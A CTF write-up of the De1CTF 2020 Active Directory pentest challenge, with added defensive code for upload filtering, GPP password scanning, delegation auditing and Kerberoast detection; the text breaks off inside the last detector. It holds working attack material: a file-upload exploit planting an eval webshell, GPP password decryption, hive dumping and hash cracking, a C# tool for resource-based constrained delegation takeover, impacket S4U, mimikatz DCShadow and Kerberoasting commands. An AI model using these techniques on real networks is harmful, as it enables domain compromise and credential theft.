De1CTF 2020 pentest: unintended and intended solutions

pentest1

First there is a file upload with a filter bypass. A teammate did this part, so I'll just give the exploit script directly.

```python
import requests
import re
import sys

url='http://47.113.219.76/index.php'
headers={
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryhJUhA4FiLizuakBx'
}
# Hand-built multipart body; the two {} are filled with the filename and the file content below
data="""------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="file"; filename="{}"
Content-Type: image/jpeg

{}
------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="submit"

submit
------WebKitFormBoundaryhJUhA4FiLizuakBx--"""

# Content of the uploaded file (PHP short tags)
payload="""
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?>
<?=$_?>
<?=$__=$_?>
<?=$___=$_?>
<?=$____=$_?>
<?=$_____=$_?>
<?=$______=$_?>
<?=$_______=$_?>
<?=$________=$_?>

<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>

<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>

<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>

<?=++$_____?>
<?=++$_____?>
<?=++$_____?>
<?=++$_____?>

<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>

<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>

<?=$________='_'?>


<?=$_________=$__.$___.$__.$____.$_____.$______?>
<?=$__________=$________.$_______.$_____.$____?>

<?=$____________________=$$__________?>


<?=$____________________[_]($____________________[__],$____________________[___])?>

"""

data=data.format("syc.pHp",payload)

r=requests.post(url=url,headers=headers,data=data)

# The response echoes the stored path after "in:"
filename=re.search("in:(uploads/.*)",r.text).group(1)
filename=filename.strip()

print("http://47.113.219.76/"+filename)
r=requests.get("http://47.113.219.76/"+filename+"?_=file_put_contents&__=1.php&___=<?php eval($_POST[a]);?>")

print(r.status_code)
print(r.text)
```

After it runs, 1.php is in the corresponding directory; the webshell password is a.
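From the defender's side, the filename `syc.pHp` that got through points at the usual weakness: an extension denylist compared case-sensitively (an assumption about the challenge's filter, which the post does not show). The following is an added example, not code from the post, contrasting that weak check with a hardened one: an allowlist of image extensions after lowercasing, a single extension only, magic bytes that match the declared type, a scan for any PHP open tag (including the short `<?=` form used above), and a server-chosen storage name. Sample content is constructed inline.

```python
import os
import re
import secrets

# Constructed sample values (not the payload from the post).
JPEG_MAGIC = b"\xff\xd8\xff"
MAGIC = {
    "jpg": JPEG_MAGIC,
    "jpeg": JPEG_MAGIC,
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
BLACKLIST = {"php", "php3", "php5", "phtml"}
# Any PHP open tag: "<?php", the short echo tag "<?=" or a bare "<?"
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)?", re.IGNORECASE)


def blacklist_check(filename):
    """The weak pattern: compare the raw extension against a denylist.
    The comparison is case-sensitive, so 'pHp' is not 'php' and passes."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext not in BLACKLIST


def hardened_check(filename, content):
    """Allowlist only, case-normalised, exactly one extension, matching magic
    bytes, and no PHP open tag anywhere in the body."""
    base = os.path.basename(filename)
    if base != filename or base.count(".") != 1:
        return False  # path components or double extensions such as a.php.jpg
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if not stem or ext not in MAGIC:
        return False  # not an allowlisted image type
    if not content.startswith(MAGIC[ext]):
        return False  # declared type does not match the bytes
    if PHP_OPEN_TAG.search(content):
        return False  # an image has no business containing <?php or <?=
    return True


def stored_name(filename):
    """Never keep the client's name: the server picks a random name and
    the normalised, allowlisted extension."""
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in MAGIC:
        raise ValueError("extension not allowlisted")
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    print("denylist lets syc.pHp through:", blacklist_check("syc.pHp"))
    print("hardened rejects it:", not hardened_check("syc.pHp", b"<?=$_=[]?>"))
    print("hardened accepts a real JPEG:", hardened_check("cat.jpg", JPEG_MAGIC + b"\x00" * 16))
    print("stored as:", stored_name("Cat.JPG"))
```

The tag scan is deliberately blunt: a byte sequence `<?` can occur by chance inside a real image, so the cost of this check is the occasional rejected legitimate upload, which is the right trade-off for a directory the web server will execute from. Serving uploads from a location where PHP execution is disabled removes the remaining risk even when a check fails.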

After connecting to the webshell, I bounced the shell to Cobalt Strike and used PowerView for enumeration; there is a share called Hint in the domain.

```
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-dev.ps1
powershell get-domaincomputer|get-netshare
```

Looking at this Hint share, there is a tip for getting the flag.

```
shell dir \\dc.De1CTF2020.lab\Hin
```

I copied the hint down and downloaded it; the zip turns out to need a password.

```
shell copy \\dc.De1CTF2020.lab\Hint\flag1_and_flag2hint.zip .
```

Continuing enumeration, a look at the domain users turns up a suspicious one.

```
shell net user /dom
```

My guess was that the HintZip_Pass account's password is the zip password. After some attempts I wondered whether it might be GPP and tried exporting it directly with PowerShell, which threw an error saying the current user is not a domain user (objectively, the current account is a domain user).

```
powershell-import /Users/cengsiqi/Desktop/pentest/Get-GPPPassword.ps1
powershell Get-GPPPassword
```

I'm no good at modifying PowerShell scripts, so I just walked SYSVOL by hand (luckily there wasn't much; if there is a lot, I'd suggest bouncing to msf and using its script).

```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>
```

```
gpp-decrypt uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08
```

Use zL1PpP@sSwO3d to decrypt the flag1_and_flag2hint.zip archive from before, which gives the first flag and the hint for the next stage.
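The reason a `cpassword` in SYSVOL is game over is that the AES key it is encrypted with was published by Microsoft, so the mere presence of the attribute is the finding; MS14-025 (KB2962486) stopped the Group Policy editor from writing new ones but left existing entries in place. The scanner below is an added example, not from the post or any tool it mentions: it walks a mapping of SYSVOL paths to XML contents (constructed here, with placeholder `cpassword` values) and reports every preference entry that still carries a non-empty `cpassword`, whether it is a Groups.xml user, a scheduled task or any other preference type, since they all store the attribute on `<Properties>`.

```python
import xml.etree.ElementTree as ET

# Constructed SYSVOL contents shaped like the Groups.xml shown above.
# The cpassword values and the account names are placeholders, not from the post.
CONSTRUCTED_SYSVOL = {
    r"\\dc\SYSVOL\example.lab\Policies\{GUID-A}\Machine\Preferences\Groups\Groups.xml": (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
        '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" changed="2020-04-15 14:43:23">'
        '<Properties action="U" cpassword="PLACEHOLDER_CPASSWORD_A" userName="svc_backup"/>'
        '</User></Groups>'
    ),
    r"\\dc\SYSVOL\example.lab\Policies\{GUID-B}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<ScheduledTasks>'
        '<Task name="Nightly" changed="2020-04-15 15:00:00">'
        '<Properties action="C" runAs="EXAMPLE\\svc_task" cpassword="PLACEHOLDER_CPASSWORD_B"/>'
        '</Task></ScheduledTasks>'
    ),
    # An entry whose password was removed: cpassword="" is not a finding.
    r"\\dc\SYSVOL\example.lab\Policies\{GUID-C}\Machine\Preferences\Groups\Groups.xml": (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
        '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin">'
        '<Properties action="U" cpassword="" userName="localadmin"/>'
        '</User></Groups>'
    ),
}


def find_cpasswords(xml_bytes):
    """Return every element carrying a non-empty cpassword attribute.
    GPP puts the attribute on <Properties> for users, services, scheduled
    tasks, drives, data sources and printers alike, so walk the whole tree."""
    root = ET.fromstring(xml_bytes)
    parents = {child: parent for parent in root.iter() for child in parent}
    hits = []
    for el in root.iter():
        cp = el.get("cpassword")
        if not cp:
            continue  # attribute absent or "" (no stored password)
        owner = parents.get(el, root)  # the <User>/<Task>/... that names the entry
        hits.append({
            "account": el.get("userName") or el.get("runAs") or el.get("accountName") or owner.get("name"),
            "action": el.get("action"),
            "changed": owner.get("changed"),
            "cpassword_length": len(cp),  # length only; the value itself is never printed
        })
    return hits


def scan_sysvol(files):
    """files: mapping of path -> XML text. Returns only the paths with findings."""
    report = {}
    for path, text in files.items():
        hits = find_cpasswords(text.encode("utf-8"))
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_sysvol(CONSTRUCTED_SYSVOL).items():
        for h in hits:
            print(f"{path}: account={h['account']} action={h['action']} changed={h['changed']}")
```

In a real run the mapping comes from walking `\\<domain>\SYSVOL\<domain>\Policies` for `*.xml` under `Preferences`; the fix for each hit is to delete the preference item and rotate the account's password, because the entry has been readable by every domain user since it was written.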

pentest2

```
flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.
```

From the hints, the intended path is clear: obtain De1ta's password through some form of offline cracking, then exploit an ACL abuse problem on the De1ta user to take over the domain controller and read C:\Users\Administrator\Desktop\flag.txt.

For the offline cracking part my route was unintended: the server's web account had the privilege needed for JuicyPotato escalation. I never got it to work myself. Another player did succeed at the time and bounced a SYSTEM shell to me. Dump the De1ta account's MSCache hash:

```
reg save hklm\system system.hive
reg save hklm\security security.hive

python secretsdump.py -security /Users/cengsiqi/Desktop/hash/security.hive -system /Users/cengsiqi/Desktop/hash/SYSTEM.hive LOCAL
```

This yields:

```
DE1CTF2020.LAB/De1ta:$DCC2$10240#De1ta#52c2cfff23d879a2ba830cf184c10b46
```

Given the password complexity from the hint, hashcat cracks it to 3f23ea12.

With the password in hand, the next step is the De1ta ACL abuse problem from the hint.

```
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-master.ps1
powershell Get-ObjectAcl -Domain De1CTF2020.lab -ResolveGUIDs|?{$_.IdentityReference -eq "DE1CTF2020\De1ta"}
```

The output is large; two places matter. The first is De1ta's ExtendedRight, which gives it the ability to carry out a DCShadow attack.

From reading up on it, a DCShadow attack needs a privileged account like De1ta plus a SYSTEM account. By the time I got here JuicyPotato had been patched and the administrator hash I had grabbed earlier had been changed. (Inexperience on my part: had I grabbed the machine account hash earlier, I could have escalated with that too.)

That brings us to the second place. The De1ta user has WriteProperty on the DM machine object, and the environment is Server 2012, so DM can be taken over through it (the C# below adds a machine account and configures resource-based constrained delegation on DM).

```csharp
using System;
using System.Text;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Net;

namespace Addnew_MachineAccount
{
    class Program
    {
        static void Main(string[] args)
        {
            String DomainController = "192.168.0.12";
            String Domain = "De1CTF2020.lab";
            String new_MachineAccount = "lisan4"; // machine account to add
            String new_MachineAccount_password = "sycl0ver"; // machine account password
            String victimcomputer = "DM"; // machine to take over
            String victimcomputer_ldap_path = "LDAP://CN=DM,CN=Computers,DC=De1CTF2020,DC=lab";
            String machine_account = new_MachineAccount;
            String sam_account = machine_account + "$";

            String distinguished_name = "";
            String[] DC_array = null;
            distinguished_name = "CN=" + machine_account + ",CN=Computers";
            DC_array = Domain.Split('.');
            foreach (String DC in DC_array)
            {
                distinguished_name += ",DC=" + DC;
            }
            Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            //Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);

            // connect to LDAP
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            //NetworkCredential nc = new NetworkCredential(username, password); // log in with explicit credentials

            System.DirectoryServices.Protocols.LdapConnection connection = null;
            //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
            });
            try
            {
                // add the machine account
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account: " + machine_account + " Password: " + new_MachineAccount_password + " added");
            }
            catch (System.Exception ex)
            {
                Console.WriteLine("[-] The new machine could not be created! User may have reached the ms-DS-MachineAccountQuota limit.");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }

            // get the SID of the new computer object
            var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
            var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
            SecurityIdentifier sid = null;
            foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
            {
                try
                {
                    sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                    Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
                }
                catch
                {
                    Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                    return;
                }
            }

            // configure resource-based constrained delegation
            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("De1CTF2020.lab", "De1ta", "3f23ea12");

            myldapConnection.Path = victimcomputer_ldap_path;

            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            // find the target computer via LDAP
            search.Filter = "(CN=" + victimcomputer + ")";
            string[] requiredProperties = new string[] { "samaccountname" };
            foreach (String property in requiredProperties)
                search.PropertiesToLoad.Add(property);
            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "Exiting...");
                return;
            }
            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
                String sec_desc = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
                System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_desc);
                byte[] descriptor_buffer = new byte[sd.BinaryLength];
                sd.GetBinaryForm(descriptor_buffer, 0);
                // put the new machine's SID into msds-allowedtoactonbehalfofotheridentity
                entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
                try
                {
                    entryToUpdate.CommitChanges(); // commit the change
                    Console.WriteLine("[+] Exploit successfully!");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    Console.WriteLine("[!] \nFailed...");
                    return;
                }
            }
        }
    }
}
```

Because the environment was chaotic, with several teams overwriting each other's msds-allowedtoactonbehalfofotheridentity, I ended up adding several machine accounts one after another: lisan3$, lisan4$.
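The attribute the C# above writes, msDS-AllowedToActOnBehalfOfOtherIdentity, is a plain security descriptor, which makes it easy to audit: every allow ACE in its DACL is an account that may impersonate users to that computer. The following is an added example, not code from the post or from the tool it describes; it parses the SDDL form of such a descriptor (the binary attribute can be converted with .NET's `RawSecurityDescriptor.GetSddlForm`, the reverse of what the C# does), decodes the rights letters, and flags any trustee not on an approved list. The descriptor and SIDs here are constructed placeholders in the same shape as `sec_desc` above.

```python
import re

# Constructed descriptor in the SDDL shape the C# above writes (placeholder SIDs).
CONSTRUCTED_SD = (
    "O:BAD:"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1109)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1205)"
)
# Accounts documented as allowed to delegate to this computer (constructed).
APPROVED_SIDS = {"S-1-5-21-1111111111-2222222222-3333333333-1205"}

ACE_RE = re.compile(r"\(([^)]*)\)")
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS",
}
# Two-letter SDDL aliases for well-known SIDs (the two that appear in the C# string).
SID_ALIASES = {"BA": "S-1-5-32-544", "SY": "S-1-5-18"}


def resolve_sid(token):
    return SID_ALIASES.get(token, token)


def decode_rights(rights):
    """Rights are either a hex access mask or a run of two-letter tokens."""
    if rights.startswith("0x"):
        return [rights]
    return [RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]


def parse_sddl(sddl):
    """Split into O:/G:/D:/S: parts and decode the six fields of every ACE."""
    parts = {}
    for chunk in re.split(r"(?=[OGDS]:)", sddl):
        if chunk:
            parts[chunk[0]] = chunk[2:]
    result = {
        "owner": resolve_sid(parts.get("O", "")),
        "group": resolve_sid(parts.get("G", "")),
        "dacl": [],
        "sacl": [],
    }
    for key, name in (("D", "dacl"), ("S", "sacl")):
        for ace in ACE_RE.findall(parts.get(key, "")):
            fields = ace.split(";")
            if len(fields) != 6:
                continue  # conditional or malformed ACE; not handled here
            ace_type, flags, rights, obj_guid, inh_guid, sid = fields
            result[name].append({
                "type": ace_type,            # "A" allow, "D" deny, ...
                "flags": flags,
                "rights": decode_rights(rights),
                "object_guid": obj_guid,
                "inherit_guid": inh_guid,
                "sid": resolve_sid(sid),
            })
    return result


def audit_rbcd(computer, sddl, approved_sids):
    """Every allow ACE is an identity that may act on behalf of other users
    to `computer`; report each and mark whether it was expected."""
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] != "A":
            continue
        findings.append({
            "computer": computer,
            "trustee": ace["sid"],
            "approved": ace["sid"] in approved_sids,
            "rights": ace["rights"],
        })
    return findings


if __name__ == "__main__":
    for f in audit_rbcd("DM", CONSTRUCTED_SD, APPROVED_SIDS):
        flag = "ok" if f["approved"] else "UNEXPECTED"
        print(f"{f['computer']}: {f['trustee']} [{flag}]")
```

Run across every computer object with the attribute set, a non-empty result for a server nobody configured delegation for is exactly the signal this challenge leaves behind; the complementary control is directory-service change auditing (event 5136 on modification of this attribute) and keeping ms-DS-MachineAccountQuota at zero so that low-privileged users cannot create the machine account the write needs.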
With the delegation in place, the next step is S4U escalation. I hit a big pitfall here, which I'll go through below. I started with kekeo.

```
tgt::ask /user:lisan3$ /domain:De1CTF2020.lab /ntlm:30a7b270355d67451970d37ff1c9b666
tgs::s4u /tgt:TGT_lisan3$@DE1CTF2020.LAB_krbtgt~De1CTF2020.lab@DE1CTF2020.LAB.kirbi /user:Administrator@De1CTF2020.lab /service:cifs/DM.De1CTF2020.lab
```

S4U2self succeeded but S4U2proxy failed (I double-checked at the time that the delegation had been set).

I switched tools to Rubeus. But dir never worked (I later asked another player, whose answer was: accessing your own host authenticates as the current user by default and does not go through network authentication, so you have to explicitly invoke network authentication).

By this point it was late and I couldn't grind any more, so I stopped. The day after the competition ended, the challenge author told me impacket can do the S4U, and it works.

```
proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/lisan4$.ccache
proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -k -impersonate Administrator -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/Administrator.ccache
proxychains psexec.py -k -no-pass dm.De1CTF2020.lab
```

One thing to be absolutely sure of: make the requests with the FQDN (dm.De1CTF2020.lab), not the IP address. This bears repeating: FQDN, not IP.
With SYSTEM, it's on to the DCShadow steps.

Under SYSTEM:

```
shell mimikatz.exe "!+" "!processtoken" "lsadump::dcshadow /object:de1ta /attribute:primaryGroupID /value:512"
```

I had always assumed a non-interactive mimikatz run like this would be closed automatically by the beacon once it finished; in practice it is not.

Under De1ta:

```
shell mimikatz.exe "lsadump::dcshadow /push" "exit"
```

After it runs, the SYSTEM side reacts.

```
shell net group "domain admins" /domain
```

You'll see it has been added.

By rights you could dir straight away now, but there was one last baffling pitfall (ignore the mistyped path in the screenshot; it doesn't change the point, which is that access was denied; a nonexistent path gives a different error).

Requesting a fresh TGT with Rubeus fixes it.

```
shell Rubeus.exe asktgt /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /domain:de1ctf2020.lab /ptt
shell type \\dc\c$\users\Administrator\Desktop\flag.txt
```


Now for the intended solution for getting the De1ta account's password.

```
shell setspn -s http/DM.De1CTF2020.lab De1CTF2020\De1ta
```

```
shell cscript GetUserSPNs.vbs
```

```
powershell-import /Users/cengsiqi/Desktop/pentest/Empire/data/module_source/credentials/Invoke-Kerberoast.ps1
powershell Invoke-Kerberoast
```
```
TicketByteHexStream  : 
Hash : $krb5tgs$http/DM.De1CTF2020.lab:0B5E0028717C31BF16F95DDF
CA441A51$A71E43FD37E2E10E3029FE2767B0266CCABE13F68B27A46
955A440DA3F3B4AF1D4C7A8C357B69655364C27DA73C80FBE9075A94
615EB720E7A3E1E8610A1C18962338E87479D0A17D902B904B4DE4B5
AD3BAE015D3709899570BD6D25392C9E98345535523CCBE65125B0E7
1F2482040F2347DD13B7062B8A9E6DAA5C79F2843A2F030BBA0DCA91
8FFEEE32D61BCAF4453315AAED98A427CF843C71EDB3EFBD2F47EF83
9229E51A6A10A9D180B6EAF698B9C5D446F61BCA21E59413EC380A3F
426F941EA42704B7262812E44FA1F04F05DAFF0E06B5690538D3BB8B
10263FE97E05D6FE9F9E5BF1EFFF6A0344FA8F8B20CC0AA39BF95538
4C3B543BF9B9A4E23C8F071D24E846F284A6FE62278E76ED47897FB2
3264CC57A7EDE8C613EAD87914C511F2554AAEA6F663E66B8BA0760C
296F82253303A5FF2DF5F8343AD2097F57B376BF83C302D806D620B9
8ED2D3C53DF65AE37A7D6356EFC1A9123CCF56549A5288C132E3F5D0
5A066CE50FFCB654BF79FD5F673175F9AD98C1140E8B50D0F574080A
48EADBFBB00668B96A79F95E429CC42B4BD3CA2C9A106CD6D39312D9
BD13B4452861E47DD71F36D3DAD4A570480D56BDEF1F278518219FA2
5D076758B994C5F4EC8CF49C85DA1CFFAC91DF63AB5D71EF5135CD36
D54FCB9C2A9EF61D67A3BC01EF668F255A66487F3493BE0F8352EAFF
A009D561BE459F1130C6A3AF81060FD82232B3E430A196C5580FBDBB
3EEAC6AA6FD2774063CB16C1CB161B20CD6ED3BF414349DECCCF8753
9CE1EEBC28DD27DCE32752640F22817286211841DE22191300D75970
D721021FA1211FA368A14EACEBABA5B42B1F3B087CE04782A695F046
1CCCDC1445DE56D31582825E2824E47499C91A396D867A4284C4DD40
AD1E1AF7A2073729FCB66A52C076A7F3515C93F54189CBDAAF408838
736CA682CFF82CBA4DBFF757CD297CC16FF0A8F6F7C9F206ACB5BB87
61C54AD1635572C16E6FC01B40E6F84F71153514EA21A87B28358A38
4B3ECA5206F35EE3732DADE97726E07E8FEBE3D7EE3A77A2A4EEE1BE
59F4EC5336E4F65D2A4F111C79A73D24F9BDFCCBEAEAC5768538EFAD
00A191BB7941DF4A441BB83D061D42CB59D03A61921117DB835AA1D0
DEB00AD6BC4A694CC39A465CF23447D7CDB1F19EBFCB92C555E75CE6
7999B76A4FE22D1D34AF706A1505DC027D8BDC8A0055095605255BB8
F437551248B77A559463C39934A6A95F183DD1FF5C4152949C0B6F69
6C4B6A649A4B207CE4202B8884F54C1BC9ECA86F966EF2B86F3A89D3
1E07C880C5E5DBCD35338FB485A46E74779D45BF38E2398A16377C15
43E32DACFF71713DBF7288640AA751FC5A51B8DF873BBEB1F946331C
CF59E6FC4209322D9BCAB8C51F5B408545BA9C4DA11755B4477DF968
90F72E86D900D78BE6006BD14E1380725D1D8
SamAccountName : De1ta
DistinguishedName : CN=De1ta,CN=Users,DC=De1CTF2020,DC=lab
ServicePrincipalName : http/DM.De1CTF2020.lab
```

```
hashcat -m 13100 -a 0 kerberos.txt cracks.txt
```

PS: you can also enumerate the SPN users with PowerShell.

```
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/kerberoast/GetUserSPNs.ps1
powershell GetUserSPNs
```
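What makes the intended solution crackable at all is that the service ticket for a user-account SPN comes back encrypted with RC4 under the account's password hash (hashcat mode 13100 is exactly etype 23, 0x17), and that every domain user can request one. On the domain controller this leaves Security event 4769 records, which is where detection lives. The following is an added example, not from the post or any tool it mentions: it takes records shaped like the 4769 fields (constructed inline), keeps successful RC4 tickets for SPNs that belong to user accounts rather than machine accounts or krbtgt, and alerts when one requester collects tickets for several distinct services in a short window, the pattern Invoke-Kerberoast produces. Field names follow the real event; the window and threshold are assumptions to tune.

```python
from collections import defaultdict

# Constructed records shaped like the fields of Security event 4769
# ("A Kerberos service ticket was requested"); not real log data.
CONSTRUCTED_4769 = [
    {"time": 1, "TargetUserName": "alice@EXAMPLE.LAB", "ServiceName": "DM$",        "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"time": 2, "TargetUserName": "bob@EXAMPLE.LAB",   "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"time": 3, "TargetUserName": "bob@EXAMPLE.LAB",   "ServiceName": "svc_web",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"time": 4, "TargetUserName": "bob@EXAMPLE.LAB",   "ServiceName": "De1ta",      "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"time": 5, "TargetUserName": "carol@EXAMPLE.LAB", "ServiceName": "krbtgt",     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.7", "Status": "0x0"},
    {"time": 6, "TargetUserName": "dave@EXAMPLE.LAB",  "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.8", "Status": "0x0"},
    {"time": 7, "TargetUserName": "erin@EXAMPLE.LAB",  "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.6", "Status": "0x1b"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP


def is_user_spn(service_name):
    """Machine accounts end in '$' and krbtgt is the KDC itself; roasting
    targets SPNs registered on ordinary user accounts (like http/DM... on De1ta)."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_user_service_tickets(events):
    """Successful service-ticket requests that used RC4 for a user-account SPN."""
    return [
        e for e in events
        if e["Status"] == "0x0"
        and e["TicketEncryptionType"].lower() in RC4_ETYPES
        and is_user_spn(e["ServiceName"])
    ]


def find_roasting(events, window=600, min_services=3):
    """Group the RC4 user-SPN requests by requester and source address and
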